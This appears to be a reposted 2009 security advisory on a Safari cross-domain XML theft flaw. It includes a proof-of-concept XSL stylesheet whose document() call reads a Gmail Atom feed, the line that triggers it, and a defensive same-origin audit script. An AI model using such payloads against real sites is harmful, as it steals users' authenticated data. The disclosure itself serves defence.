June 11, 2009, 7:54 AM
Apple Safari cross-domain XML theft vulnerability
Safari prior to version 4 may permit an evil web page to steal
arbitrary XML data cross-domain.

This is accomplished by abusing a relatively obscure cross-domain
access point which was completely missing a cross-domain access check.
The access point in question is the document() function in XSL. This
is best illustrated with a sample evil XSL file which abuses this

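<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
Below, you should see e-mail stolen cross-domain!
<!-- document() is the access point that was missing the cross-domain check -->
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
</xsl:template>
</xsl:stylesheet>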

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>
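
The check that was missing can be sketched as a same-origin gate on every document() target, resolved against the stylesheet's own URL. This is an added example, not WebKit's or the advisory's code; the function names, the `site.example` stylesheet URL and the sample stylesheet are assumptions constructed for illustration.

```javascript
// Added illustration: same-origin gate for XSLT document() loads.
// Not WebKit's code; names and sample values below are assumptions.

// Origin = scheme + host + port; the URL parser normalizes default ports.
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  // Opaque origins (file:, data:) serialize to "null" and never match.
  return ua.origin !== "null" && ua.origin === ub.origin;
}

// Collect the string-literal arguments of document() calls in a stylesheet.
function documentTargets(xslText) {
  const re = /\bdocument\(\s*(['"])(.*?)\1/g;
  return [...xslText.matchAll(re)].map((m) => m[2]);
}

// Decide, per document() target, whether the load should be allowed.
// A string argument resolves against the stylesheet's base URI (XSLT 1.0),
// so document('') means the stylesheet itself.
function auditStylesheet(xslText, stylesheetUrl) {
  return documentTargets(xslText).map((target) => {
    let resolved;
    try {
      resolved = new URL(target, stylesheetUrl).href;
    } catch {
      return { target, allowed: false, reason: "unparseable URL" };
    }
    const allowed = sameOrigin(resolved, stylesheetUrl);
    const reason = allowed ? "same origin" : "cross-origin";
    return { target, resolved, allowed, reason };
  });
}

// Constructed sample input: one cross-origin target, two same-origin ones.
const SAMPLE_STYLESHEET_URL = "https://site.example/xsl/safaristealmailbug.xsl";
const SAMPLE_XSL = `
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
<xsl:value-of select="document('lookup.xml')"/>
<xsl:copy-of select="document('')"/>`;

for (const r of auditStylesheet(SAMPLE_XSL, SAMPLE_STYLESHEET_URL)) {
  console.log(r.allowed ? "ALLOW" : "BLOCK", r.target || "(self)", "-", r.reason);
}
```

The same functions can be used to audit stylesheets served from your own site for document() calls that reach other origins.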

There are a number of interesting XML-based formats you might want to
steal including authenticated RSS, XML-formatted AJAX-y responses, and

Full technical details: http://scary.beasts.org/security/CESA-2009-008.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html
(includes 1-click demo)

Added by: Siegh_Wahrhreit